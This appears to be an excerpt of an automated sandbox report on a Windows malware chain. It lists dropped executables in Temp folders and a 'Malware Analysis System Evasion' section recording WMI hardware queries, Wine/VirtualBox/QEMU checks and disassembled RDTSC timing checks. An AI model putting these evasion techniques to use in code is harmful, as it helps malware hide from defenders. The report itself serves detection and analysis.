                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\]Q
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE`,]Q
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE81E second address: DDE840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE840 second address: DDE845 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BB8 second address: F74BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F1F50CBBC3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BC5 second address: F74BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BC9 second address: F74BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74BCF second address: F74BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6661A second address: F66627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73D11 second address: F73D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73E40 second address: F73E6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F1F50CBBC3Bh 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F1F50CBBC36h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73E6E second address: F73E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73E72 second address: F73E78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F744DE second address: F74507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007F1F50F77976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50F77985h 0x00000013 jnp 00007F1F50F77976h 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F773E0 second address: F773FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F50CBBC3Dh 0x00000008 jns 00007F1F50CBBC36h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F774DB second address: F774EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F7797Fh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F774EE second address: F77537 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub ecx, dword ptr [ebp+122D27B5h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F1F50CBBC38h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov edx, 5E3CD361h 0x00000036 push FCEF953Ch 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77537 second address: F7759E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 03106B44h 0x0000000e mov dword ptr [ebp+122D19A7h], edi 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D18F5h], ebx 0x0000001e push 00000003h 0x00000020 movzx edi, si 0x00000023 push A269BCA5h 0x00000028 jmp 00007F1F50F77986h 0x0000002d xor dword ptr [esp], 6269BCA5h 0x00000034 mov edx, dword ptr [ebp+122D3592h] 0x0000003a lea ebx, dword ptr [ebp+1246C327h] 0x00000040 sub esi, 133A1307h 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push esi 0x0000004c pop esi 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 jc 00007F1F50F77976h 0x00000056 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7759E second address: F775BE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50CBBC42h 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7767C second address: F776E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77980h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1F50F77980h 0x0000000f popad 0x00000010 xor dword ptr [esp], 64A30400h 0x00000017 je 00007F1F50F77982h 0x0000001d jmp 00007F1F50F7797Ch 0x00000022 push 00000003h 0x00000024 xor dx, 8A94h 0x00000029 xor ecx, 3B861720h 0x0000002f push 00000000h 0x00000031 mov esi, dword ptr [ebp+122D3406h] 0x00000037 push 00000003h 0x00000039 or ecx, 0CBBA4D0h 0x0000003f call 00007F1F50F77979h 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F776E5 second address: F776EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F776EA second address: F776EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F776EF second address: F77737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F1F50CBBC3Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F1F50CBBC45h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1F50CBBC49h 0x00000020 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77737 second address: F7774D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F50F77978h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7774D second address: F77757 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77757 second address: F7775D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7775D second address: F77790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+122D3552h] 0x0000000f lea ebx, dword ptr [ebp+1246C330h] 0x00000015 add dword ptr [ebp+122D3021h], esi 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f jmp 00007F1F50CBBC43h 0x00000024 pop ecx 0x00000025 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7783D second address: F77841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7796D second address: F77972 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96407 second address: F96411 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F50F7797Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F965B1 second address: F965B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F968C4 second address: F968C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
